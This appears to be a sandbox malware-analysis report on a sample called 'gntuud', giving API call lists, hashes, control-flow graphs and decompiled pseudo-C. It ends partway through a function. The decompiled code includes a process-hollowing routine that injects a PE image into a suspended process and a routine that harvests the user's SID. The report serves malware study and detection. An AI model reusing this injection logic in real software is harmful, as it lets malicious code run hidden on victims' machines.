                                                                • Instruction ID: f34f057c1e5a000f7d12b7eeda6ad86c89b133dcd94049d6ad18afeba1d444d3
                                                                • Opcode Fuzzy Hash: 3b5b23c5fa6689e84e77140b6718f819b8b7c5b1361dddae77b329bb3301316b
                                                                • Instruction Fuzzy Hash: 3F3126717082009BC7289E7898805EEB7F9EB49320B20033FF925C7381DA799DC48799
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 760 41843e-418441 761 418450-418453 call 41cd6d 760->761 763 418458-41845b 761->763 764 418443-41844e call 41cd87 763->764 765 41845d-41845e 763->765 764->761 768 41845f-418463 764->768 769 402180-4021d0 call 402160 call 4194c4 call 419289 768->769 770 418469-418966 call 41808f call 4194c4 768->770
                                                                APIs
                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 004021BE
                                                                  • Part of subcall function 004194C4: RaiseException.KERNEL32(E06D7363,00000001,00000003,0040219C,?,?,?,0040219C,?,00437E5C), ref: 00419524
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionRaise___std_exception_copy
                                                                • String ID:
                                                                • API String ID: 3109751735-0
                                                                • Opcode ID: 79d6810a6da1c1d9ca177275396e2fb46f041ff4ad844d49819a2d778b4ddbcc
                                                                • Instruction ID: 1360fb4ad49e0a6147ae39c92cddbc32fcbc4ed3f3bf1f3567188be308e30735
                                                                • Opcode Fuzzy Hash: 79d6810a6da1c1d9ca177275396e2fb46f041ff4ad844d49819a2d778b4ddbcc
                                                                • Instruction Fuzzy Hash: C801667580020D77CB10BAA5EC469CA77AC9F00714B50863BFA14A7182FFB8EAC586DD
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 782 41eb6a-41eb76 783 41eba8-41ebb3 call 41c830 782->783 784 41eb78-41eb7a 782->784 791 41ebb5-41ebb7 783->791 785 41eb93-41eba4 RtlAllocateHeap 784->785 786 41eb7c-41eb7d 784->786 789 41eba6 785->789 790 41eb7f-41eb86 call 41dd0f 785->790 786->785 789->791 790->783 794 41eb88-41eb91 call 41cd87 790->794 794->783 794->785
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041EB9C
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: ecd79cb36f7ca9338d77787c855043579e064d7a7eef218fea13d0a1f95cdbd9
                                                                • Instruction ID: c90605ddd2e615d822dec7d9fa3785c36c8ad6d34a685d0396ccfd50e39799fb
                                                                • Opcode Fuzzy Hash: ecd79cb36f7ca9338d77787c855043579e064d7a7eef218fea13d0a1f95cdbd9
                                                                • Instruction Fuzzy Hash: 1BE0E5395491205AEA30A633AC04BDB7A489F813A2F111137AD0A966C1CB5CECC281ED
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                C-Code - Quality: 84%
                                                                			E00403FB0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                				signed int _v8;
                                                                				char _v268;
                                                                				struct _STARTUPINFOA _v336;
                                                                				void _v340;
                                                                				struct _PROCESS_INFORMATION _v356;
                                                                				long _v360;
                                                                				void* _v364;
                                                                				CONTEXT* _v368;
                                                                				signed int _t46;
                                                                				void* _t63;
                                                                				void* _t64;
                                                                				_Unknown_base(*)()* _t85;
                                                                				CONTEXT* _t88;
                                                                				void* _t89;
                                                                				long _t98;
                                                                				intOrPtr* _t101;
                                                                				void* _t103;
                                                                				signed int _t104;
                                                                
                                                                				_t46 =  *0x439008; // 0x2f6e538a
                                                                				_v8 = _t46 ^ _t104;
                                                                				_t103 = __ecx;
                                                                				GetModuleFileNameA(0,  &_v268, 0x104);
                                                                				if( *_t103 != 0x5a4d) {
                                                                					L12:
                                                                					VirtualFree(_t103, 0, 0x8000);
                                                                					return E00418232(_v8 ^ _t104);
                                                                				} else {
                                                                					_t101 =  *((intOrPtr*)(_t103 + 0x3c)) + _t103;
                                                                					if( *_t101 != 0x4550) {
                                                                						goto L12;
                                                                					} else {
                                                                						E00419710(_t101,  &_v336, 0, 0x44);
                                                                						asm("xorps xmm0, xmm0");
                                                                						asm("movups [ebp-0x160], xmm0");
                                                                						if(CreateProcessA( &_v268, 0, 0, 0, 0, 4, 0, 0,  &_v336,  &_v356) == 0) {
                                                                							goto L12;
                                                                						} else {
                                                                							_t88 = VirtualAlloc(0, 4, 0x1000, 4);
                                                                							_v368 = _t88;
                                                                							_t88->ContextFlags = 0x10007;
                                                                							if(GetThreadContext(_v356.hThread, _t88) == 0) {
                                                                								goto L12;
                                                                							} else {
                                                                								ReadProcessMemory(_v356.hProcess, "   ",  &_v340, 4, 0);
                                                                								_t63 =  *(_t101 + 0x34);
                                                                								if(_v340 == _t63) {
                                                                									_t85 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
                                                                									 *_t85(_v356.hProcess, _v340);
                                                                									_t63 =  *(_t101 + 0x34);
                                                                								}
                                                                								_t64 = VirtualAllocEx(_v356.hProcess, _t63,  *(_t101 + 0x50), 0x3000, 0x40);
                                                                								_v364 = _t64;
                                                                								if(_t64 == 0) {
                                                                									goto L12;
                                                                								} else {
                                                                									WriteProcessMemory(_v356.hProcess, _t64, _t103,  *(_t101 + 0x54), 0);
                                                                									_v360 = 0;
                                                                									if(0 <  *(_t101 + 6)) {
                                                                										_t89 = 0;
                                                                										do {
                                                                											WriteProcessMemory(_v356.hProcess,  *((intOrPtr*)(_t89 + _t103 +  *((intOrPtr*)(_t103 + 0x3c)) + 0x104)) + _v364,  *((intOrPtr*)(_t89 + _t103 +  *((intOrPtr*)(_t103 + 0x3c)) + 0x10c)) + _t103,  *(_t89 + _t103 +  *((intOrPtr*)(_t103 + 0x3c)) + 0x108), 0);
                                                                											_t89 = _t89 + 0x28;
                                                                											_t98 = _v360 + 1;
                                                                											_v360 = _t98;
                                                                										} while (_t98 < ( *(_t101 + 6) & 0x0000ffff));
                                                                										_t88 = _v368;
                                                                									}
                                                                									WriteProcessMemory(_v356, _t88->Ebx + 8, _t101 + 0x34, 4, 0);
                                                                									_t88->Eax =  *((intOrPtr*)(_t101 + 0x28)) + _v364;
                                                                									SetThreadContext(_v356.hThread, _t88);
                                                                									ResumeThread(_v356.hThread);
                                                                									VirtualFree(_t103, 0, 0x8000);
                                                                									return E00418232(_v8 ^ _t104);
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                			}





















                                                                0x00403fb9
                                                                0x00403fc0
                                                                0x00403fd1
                                                                0x00403fd6
                                                                0x00403fe4
                                                                0x004041cd
                                                                0x004041d5
                                                                0x004041eb
                                                                0x00403fea
                                                                0x00403fed
                                                                0x00403ff5
                                                                0x00000000
                                                                0x00403ffb
                                                                0x00404006
                                                                0x00404014
                                                                0x00404017
                                                                0x00404043
                                                                0x00000000
                                                                0x00404049
                                                                0x0040405a
                                                                0x0040405d
                                                                0x00404063
                                                                0x00404077
                                                                0x00000000
                                                                0x0040407d
                                                                0x00404093
                                                                0x00404099
                                                                0x004040a2
                                                                0x004040b5
                                                                0x004040c7
                                                                0x004040c9
                                                                0x004040c9
                                                                0x004040dd
                                                                0x004040e3
                                                                0x004040eb
                                                                0x00000000
                                                                0x004040f1
                                                                0x004040fe
                                                                0x00404106
                                                                0x00404114
                                                                0x00404116
                                                                0x00404118
                                                                0x00404142
                                                                0x0040414e
                                                                0x00404155
                                                                0x00404156
                                                                0x0040415c
                                                                0x00404160
                                                                0x00404160
                                                                0x0040417e
                                                                0x0040418e
                                                                0x0040419a
                                                                0x004041a6
                                                                0x004041b4
                                                                0x004041cc
                                                                0x004041cc
                                                                0x004040eb
                                                                0x00404077
                                                                0x00404043
                                                                0x00403ff5

                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403FD6
                                                                • CreateProcessA.KERNEL32 ref: 0040403B
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00404054
                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0040406F
                                                                • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00404093
                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 004040AE
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004040B5
                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 004040DD
                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004040FE
                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 00404142
                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 0040417E
                                                                • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 0040419A
                                                                • ResumeThread.KERNEL32(?,?,?,00000000), ref: 004041A6
                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 004041B4
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004041D5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                • API String ID: 4033543172-1522589568
                                                                • Opcode ID: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
                                                                • Instruction ID: a9cd7b4eca6fd75c363069a252156244f2b8a6c1c24f95c61792526d0bff3807
                                                                • Opcode Fuzzy Hash: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
                                                                • Instruction Fuzzy Hash: 25517C71640218AFDB219F50DC49FEAB7B4FF48705F9000B6F608AA2D1D7B16995CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0095423D
                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 009542A2
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 009542BB
                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 009542D6
                                                                • ReadProcessMemory.KERNEL32(?,00434ED4,?,00000004,00000000), ref: 009542FA
                                                                • GetModuleHandleA.KERNEL32(00434EF0,00434ED8), ref: 00954315
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0095431C
                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00954344
                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00954365
                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 009543A9
                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 009543E5
                                                                • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00954401
                                                                • ResumeThread.KERNEL32(?,?,?,00000000), ref: 0095440D
                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 0095441B
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0095443C
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                • String ID:
                                                                • API String ID: 4033543172-0
                                                                • Opcode ID: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
                                                                • Instruction ID: 91f0a13869f719c92c6957adb45b96ddcf2eccc13e5c7f15d2885afd2df9141f
                                                                • Opcode Fuzzy Hash: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
                                                                • Instruction Fuzzy Hash: E2518B71640218AFDB218F54DC45FEAB7B8FF08705F9040B5FA08EA1A1D7B1A999CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1001 4037d0-40384f GetUserNameW GetProcessHeap HeapAlloc GetUserNameW 1002 4039c2-4039e5 GetProcessHeap HeapFree GetProcessHeap HeapFree GetProcessHeap HeapFree LocalFree 1001->1002 1003 403855-403897 LookupAccountNameW GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 1001->1003 1004 4039eb-403a06 call 418232 1002->1004 1003->1002 1005 40389d-40389f 1003->1005 1005->1002 1007 4038a5-4038be LookupAccountNameW 1005->1007 1007->1002 1009 4038c4-4038d1 ConvertSidToStringSidW 1007->1009 1009->1002 1010 4038d7-4038df 1009->1010 1011 4038e0-4038e9 1010->1011 1011->1011 1012 4038eb-403904 call 4186cd 1011->1012 1015 403906-40390c 1012->1015 1016 403928-40393f 1012->1016 1017 403910-403920 1015->1017 1018 403940-403945 1016->1018 1017->1017 1019 403922 1017->1019 1018->1018 1020 403947-403994 call 417040 * 2 1018->1020 1019->1016 1021 403924-403926 1019->1021 1026 403996-4039a2 1020->1026 1027 4039be-4039c0 1020->1027 1021->1016 1021->1017 1028 4039b4-4039bb call 4186bf 1026->1028 1029 4039a4-4039b2 1026->1029 1027->1004 1028->1027 1029->1028 1030 403a07-403a0f call 41cd1c 1029->1030
                                                                C-Code - Quality: 71%
                                                                			E004037D0(void* __ebx, union _SID_NAME_USE __ecx, void* __edx, void* __edi, void* __esi) {
                                                                				long _v8;
                                                                				char _v16;
                                                                				signed int _v20;
                                                                				union _SID_NAME_USE _v24;
                                                                				long _v28;
                                                                				long _v32;
                                                                				signed int _v36;
                                                                				WCHAR* _v40;
                                                                				long _v44;
                                                                				void* _v48;
                                                                				signed int _v52;
                                                                				char* _v56;
                                                                				char _v60;
                                                                				long _v64;
                                                                				long _v68;
                                                                				intOrPtr _v72;
                                                                				void* _v80;
                                                                				void* _v84;
                                                                				char _v88;
                                                                				void* _v92;
                                                                				intOrPtr _v96;
                                                                				intOrPtr _v100;
                                                                				void* _v104;
                                                                				long _v108;
                                                                				intOrPtr _v120;
                                                                				char _v124;
                                                                				long _v128;
                                                                				char _v136;
                                                                				signed int _v144;
                                                                				long _v176;
                                                                				intOrPtr _v180;
                                                                				char _v196;
                                                                				long _v200;
                                                                				long _v204;
                                                                				long _v208;
                                                                				char _v272;
                                                                				intOrPtr _v276;
                                                                				char _v288;
                                                                				struct _STARTUPINFOA _v356;
                                                                				void _v360;
                                                                				struct _PROCESS_INFORMATION _v376;
                                                                				long _v380;
                                                                				void* _v384;
                                                                				CONTEXT* _v388;
                                                                				char _v612;
                                                                				void* __ebp;
                                                                				signed int _t227;
                                                                				signed int _t228;
                                                                				WCHAR* _t235;
                                                                				int _t236;
                                                                				WCHAR* _t254;
                                                                				void** _t257;
                                                                				intOrPtr _t258;
                                                                				intOrPtr* _t259;
                                                                				intOrPtr _t260;
                                                                				long _t266;
                                                                				signed int _t272;
                                                                				signed int _t273;
                                                                				signed int _t275;
                                                                				signed int _t279;
                                                                				void* _t282;
                                                                				void* _t283;
                                                                				signed int _t285;
                                                                				void* _t286;
                                                                				void* _t288;
                                                                				signed int _t293;
                                                                				signed int _t305;
                                                                				signed int _t307;
                                                                				void* _t310;
                                                                				void* _t311;
                                                                				_Unknown_base(*)()* _t332;
                                                                				intOrPtr _t334;
                                                                				void* _t339;
                                                                				intOrPtr _t346;
                                                                				intOrPtr _t350;
                                                                				void* _t354;
                                                                				signed int _t359;
                                                                				signed int _t360;
                                                                				void* _t361;
                                                                				char* _t367;
                                                                				intOrPtr _t368;
                                                                				intOrPtr _t372;
                                                                				intOrPtr _t376;
                                                                				signed int _t380;
                                                                				signed int _t381;
                                                                				signed int _t382;
                                                                				signed int _t383;
                                                                				signed int _t384;
                                                                				signed int _t385;
                                                                				signed int _t386;
                                                                				signed int _t387;
                                                                				signed int _t388;
                                                                				void* _t392;
                                                                				intOrPtr* _t394;
                                                                				char* _t395;
                                                                				void* _t396;
                                                                				CONTEXT* _t398;
                                                                				void* _t400;
                                                                				void* _t410;
                                                                				intOrPtr* _t411;
                                                                				long _t417;
                                                                				char* _t418;
                                                                				void _t419;
                                                                				char* _t421;
                                                                				void* _t424;
                                                                				long _t432;
                                                                				intOrPtr _t433;
                                                                				intOrPtr _t440;
                                                                				char _t441;
                                                                				signed int _t458;
                                                                				void* _t459;
                                                                				void* _t460;
                                                                				char _t461;
                                                                				long _t462;
                                                                				void* _t463;
                                                                				long _t465;
                                                                				short* _t466;
                                                                				WCHAR* _t467;
                                                                				short* _t468;
                                                                				long _t469;
                                                                				intOrPtr _t470;
                                                                				void* _t471;
                                                                				void* _t472;
                                                                				long _t474;
                                                                				void* _t476;
                                                                				void* _t485;
                                                                				intOrPtr* _t489;
                                                                				long _t490;
                                                                				intOrPtr _t491;
                                                                				intOrPtr* _t495;
                                                                				WCHAR* _t500;
                                                                				intOrPtr* _t503;
                                                                				signed int _t505;
                                                                				long _t506;
                                                                				void* _t507;
                                                                				void* _t509;
                                                                				signed int _t514;
                                                                				signed int _t517;
                                                                				signed int _t518;
                                                                				signed int _t520;
                                                                				signed int _t524;
                                                                				void* _t525;
                                                                				void* _t527;
                                                                				signed int _t531;
                                                                				signed int _t532;
                                                                				void* _t533;
                                                                				signed int _t535;
                                                                				void* _t552;
                                                                
                                                                				_t459 = __edx;
                                                                				_t514 = _t524;
                                                                				_push(0xffffffff);
                                                                				_push(0x429818);
                                                                				_push( *[fs:0x0]);
                                                                				_t525 = _t524 - 0x44;
                                                                				_t227 =  *0x439008; // 0x2f6e538a
                                                                				_t228 = _t227 ^ _t514;
                                                                				_v20 = _t228;
                                                                				_push(__ebx);
                                                                				_push(__esi);
                                                                				_push(__edi);
                                                                				_push(_t228);
                                                                				 *[fs:0x0] =  &_v16;
                                                                				_v56 = __ecx;
                                                                				_v24 = __ecx;
                                                                				_v24 = __ecx;
                                                                				_t392 = 0;
                                                                				_v48 = 0;
                                                                				_v36 = 0;
                                                                				_v28 = 0;
                                                                				GetUserNameW(0,  &_v28);
                                                                				_t235 = HeapAlloc(GetProcessHeap(), 8, 2 + _v28 * 2);
                                                                				_v40 = _t235;
                                                                				_t236 = GetUserNameW(_t235,  &_v28);
                                                                				_t500 = _v40;
                                                                				if(_t236 == 0) {
                                                                					L19:
                                                                					HeapFree(GetProcessHeap(), 0, _t500);
                                                                					HeapFree(GetProcessHeap(), 0, _t392);
                                                                					HeapFree(GetProcessHeap(), 0, _v48);
                                                                					LocalFree(_v36);
                                                                					goto L20;
                                                                				} else {
                                                                					_v28 = 0;
                                                                					_v32 = 0;
                                                                					LookupAccountNameW(0, _t500, 0,  &_v28, 0,  &_v32,  &_v24);
                                                                					_t392 = HeapAlloc(GetProcessHeap(), 8, _v28);
                                                                					_t254 = HeapAlloc(GetProcessHeap(), 8, _v32 + _v32);
                                                                					_v48 = _t254;
                                                                					if(_t392 == 0 || _t254 == 0 || LookupAccountNameW(0, _t500, _t392,  &_v28, _t254,  &_v32,  &_v24) == 0) {
                                                                						goto L19;
                                                                					} else {
                                                                						_t257 =  &_v36;
                                                                						__imp__ConvertSidToStringSidW(_t392, _t257);
                                                                						if(_t257 == 0) {
                                                                							goto L19;
                                                                						} else {
                                                                							_t489 = _v36;
                                                                							_t503 = _t489;
                                                                							_t29 = _t503 + 2; // 0x2
                                                                							_t410 = _t29;
                                                                							do {
                                                                								_t258 =  *_t503;
                                                                								_t503 = _t503 + 2;
                                                                								_t550 = _t258;
                                                                							} while (_t258 != 0);
                                                                							_t505 = _t503 - _t410 >> 1;
                                                                							_t259 = E004186CD(_t459, _t550, _t505);
                                                                							_t527 = _t525 + 4;
                                                                							asm("xorps xmm0, xmm0");
                                                                							asm("movlpd [ebp-0x30], xmm0");
                                                                							_t394 = _t259;
                                                                							if(_t505 != 0) {
                                                                								_t485 = _v48;
                                                                								_t458 = _v52;
                                                                								do {
                                                                									 *((char*)(_t458 + _t394)) =  *((intOrPtr*)(_t489 + _t458 * 2));
                                                                									_t458 = _t458 + 1;
                                                                									asm("adc edx, 0x0");
                                                                									_t552 = _t485;
                                                                								} while (_t552 < 0 || _t552 <= 0 && _t458 < _t505);
                                                                							}
                                                                							_t411 = _t394;
                                                                							_v64 = 0;
                                                                							_v60 = 0xf;
                                                                							_v80 = 0;
                                                                							_t38 = _t411 + 1; // 0x1
                                                                							_t460 = _t38;
                                                                							do {
                                                                								_t260 =  *_t411;
                                                                								_t411 = _t411 + 1;
                                                                							} while (_t260 != 0);
                                                                							_push(_t411 - _t460);
                                                                							E00417040( &_v80, _t460, _t394);
                                                                							_t395 = _v56;
                                                                							_v8 = 0;
                                                                							_t415 =  <  ? _v64 : 0x28;
                                                                							_push( <  ? _v64 : 0x28);
                                                                							_t263 =  >=  ? _v80 :  &_v80;
                                                                							 *(_t395 + 0x10) = 0;
                                                                							 *((intOrPtr*)(_t395 + 0x14)) = 0xf;
                                                                							 *_t395 = 0;
                                                                							E00417040(_t395, _t460,  >=  ? _v80 :  &_v80);
                                                                							_t461 = _v60;
                                                                							if(_t461 < 0x10) {
                                                                								L18:
                                                                								L20:
                                                                								 *[fs:0x0] = _v16;
                                                                								return E00418232(_v20 ^ _t514);
                                                                							} else {
                                                                								_t417 = _v80;
                                                                								_t462 = _t461 + 1;
                                                                								_t266 = _t417;
                                                                								if(_t462 < 0x1000) {
                                                                									L17:
                                                                									_push(_t462);
                                                                									E004186BF(_t417);
                                                                									goto L18;
                                                                								} else {
                                                                									_t417 =  *((intOrPtr*)(_t417 - 4));
                                                                									_t462 = _t462 + 0x23;
                                                                									if(_t266 - _t417 + 0xfffffffc > 0x1f) {
                                                                										E0041CD1C(_t395, _t417, _t462, _t489, __eflags);
                                                                										asm("int3");
                                                                										asm("int3");
                                                                										asm("int3");
                                                                										asm("int3");
                                                                										_push(_t395);
                                                                										_t396 = _t527;
                                                                										_t531 = (_t527 - 0x00000008 & 0xfffffff8) + 4;
                                                                										_push(_t514);
                                                                										_v120 =  *((intOrPtr*)(_t396 + 4));
                                                                										_t517 = _t531;
                                                                										_push(0xffffffff);
                                                                										_push(0x429863);
                                                                										_push( *[fs:0x0]);
                                                                										_push(_t396);
                                                                										_t532 = _t531 - 0x68;
                                                                										_t272 =  *0x439008; // 0x2f6e538a
                                                                										_t273 = _t272 ^ _t517;
                                                                										_v144 = _t273;
                                                                										_push(_t505);
                                                                										_push(_t489);
                                                                										_push(_t273);
                                                                										 *[fs:0x0] =  &_v136;
                                                                										_t490 = _t462;
                                                                										_v208 = _t490;
                                                                										_t506 = _t417;
                                                                										_v204 = _t506;
                                                                										_v200 = _t506;
                                                                										_v200 = _t506;
                                                                										_v128 = 0;
                                                                										_t418 = 0;
                                                                										_v180 = 0;
                                                                										_v176 = 0xf;
                                                                										_v196 = 0;
                                                                										_v128 = 1;
                                                                										_t463 = 0;
                                                                										_t275 =  *(_t396 + 0x18);
                                                                										_v200 = 0;
                                                                										__eflags = _t275;
                                                                										if(_t275 == 0) {
                                                                											L50:
                                                                											 *(_t506 + 0x10) = 0;
                                                                											 *((intOrPtr*)(_t506 + 0x14)) = 0xf;
                                                                											 *_t506 = 0;
                                                                											__eflags = _t418 - 5;
                                                                											if(__eflags < 0) {
                                                                												goto L60;
                                                                											} else {
                                                                												_t132 = _t418 - 5; // -5
                                                                												_t339 = _t132;
                                                                												__eflags = _t339 - _t490;
                                                                												_t490 =  <  ? _t339 : _t490;
                                                                												__eflags = _v68 - 0x10;
                                                                												_t341 =  >=  ? _v88 :  &_v88;
                                                                												_push(_t490);
                                                                												_t342 = ( >=  ? _v88 :  &_v88) + 5;
                                                                												E00417040(_t506, _t463, ( >=  ? _v88 :  &_v88) + 5);
                                                                												_t469 = _v68;
                                                                												__eflags = _t469 - 0x10;
                                                                												if(_t469 < 0x10) {
                                                                													L55:
                                                                													_t470 =  *((intOrPtr*)(_t396 + 0x1c));
                                                                													__eflags = _t470 - 0x10;
                                                                													if(_t470 < 0x10) {
                                                                														L59:
                                                                														 *[fs:0x0] = _v28;
                                                                														__eflags = _v36 ^ _t517;
                                                                														return E00418232(_v36 ^ _t517);
                                                                													} else {
                                                                														_t440 =  *((intOrPtr*)(_t396 + 8));
                                                                														_t471 = _t470 + 1;
                                                                														_t346 = _t440;
                                                                														__eflags = _t471 - 0x1000;
                                                                														if(_t471 < 0x1000) {
                                                                															L58:
                                                                															_push(_t471);
                                                                															E004186BF(_t440);
                                                                															goto L59;
                                                                														} else {
                                                                															_t418 =  *((intOrPtr*)(_t440 - 4));
                                                                															_t463 = _t471 + 0x23;
                                                                															__eflags = _t346 - _t418 + 0xfffffffc - 0x1f;
                                                                															if(__eflags > 0) {
                                                                																goto L61;
                                                                															} else {
                                                                																goto L58;
                                                                															}
                                                                														}
                                                                													}
                                                                												} else {
                                                                													_t441 = _v88;
                                                                													_t472 = _t469 + 1;
                                                                													_t350 = _t441;
                                                                													__eflags = _t472 - 0x1000;
                                                                													if(_t472 < 0x1000) {
                                                                														L54:
                                                                														_push(_t472);
                                                                														E004186BF(_t441);
                                                                														_t532 = _t532 + 8;
                                                                														goto L55;
                                                                													} else {
                                                                														_t418 =  *((intOrPtr*)(_t441 - 4));
                                                                														_t463 = _t472 + 0x23;
                                                                														__eflags = _t350 - _t418 + 0xfffffffc - 0x1f;
                                                                														if(__eflags > 0) {
                                                                															goto L61;
                                                                														} else {
                                                                															goto L54;
                                                                														}
                                                                													}
                                                                												}
                                                                											}
                                                                										} else {
                                                                											while(1) {
                                                                												_v48 = 0;
                                                                												_v44 = 0xf;
                                                                												_v64 = 0;
                                                                												__eflags = _t275 - _t463;
                                                                												if(__eflags < 0) {
                                                                													break;
                                                                												}
                                                                												_t354 = _t275 - _t463;
                                                                												__eflags = _t354 - 1;
                                                                												_t443 =  <  ? _t354 : 1;
                                                                												__eflags =  *((intOrPtr*)(_t396 + 0x1c)) - 0x10;
                                                                												_t356 =  >=  ?  *((void*)(_t396 + 8)) : _t396 + 8;
                                                                												_push( <  ? _t354 : 1);
                                                                												_t357 = ( >=  ?  *((void*)(_t396 + 8)) : _t396 + 8) + _t463;
                                                                												E00417040( &_v64, _t463, ( >=  ?  *((void*)(_t396 + 8)) : _t396 + 8) + _t463);
                                                                												_v20 = 2;
                                                                												_t490 = _v44;
                                                                												__eflags = _t490 - 0x10;
                                                                												_t506 = _v64;
                                                                												_t418 =  >=  ? _t506 :  &_v64;
                                                                												_t359 = E00417E80(_t418, _v48, "0", 1);
                                                                												_t532 = _t532 + 8;
                                                                												__eflags = _t359;
                                                                												if(_t359 != 0) {
                                                                													L35:
                                                                													_t360 =  *(_t396 + 0x18);
                                                                													_t463 = _v92;
                                                                													_v108 = 0;
                                                                													_v104 = 0xf;
                                                                													_v124 = 0;
                                                                													__eflags = _t360 - _t463;
                                                                													if(__eflags < 0) {
                                                                														break;
                                                                													} else {
                                                                														_t361 = _t360 - _t463;
                                                                														__eflags = _t361 - 1;
                                                                														_t447 =  <  ? _t361 : 1;
                                                                														__eflags =  *((intOrPtr*)(_t396 + 0x1c)) - 0x10;
                                                                														_t363 =  >=  ?  *((void*)(_t396 + 8)) : _t396 + 8;
                                                                														_push( <  ? _t361 : 1);
                                                                														_t364 = ( >=  ?  *((void*)(_t396 + 8)) : _t396 + 8) + _t463;
                                                                														E00417040( &_v124, _t463, ( >=  ?  *((void*)(_t396 + 8)) : _t396 + 8) + _t463);
                                                                														_v20 = 3;
                                                                														_t418 =  &_v124;
                                                                														_t367 = E00417DC0(_t418,  &_v124,  &_v88);
                                                                														_t474 = _v68;
                                                                														asm("movq xmm1, [eax+0x10]");
                                                                														asm("movq [ebp-0x78], xmm1");
                                                                														asm("movups xmm0, [eax]");
                                                                														 *(_t367 + 0x10) = 0;
                                                                														 *((intOrPtr*)(_t367 + 0x14)) = 0xf;
                                                                														 *_t367 = 0;
                                                                														asm("movups [ebp-0x28], xmm0");
                                                                														__eflags = _t474 - 0x10;
                                                                														if(_t474 < 0x10) {
                                                                															L40:
                                                                															_v20 = 2;
                                                                															_t463 = _v104;
                                                                															asm("movq [ebp-0x38], xmm1");
                                                                															asm("movups [ebp-0x48], xmm0");
                                                                															__eflags = _t463 - 0x10;
                                                                															if(_t463 < 0x10) {
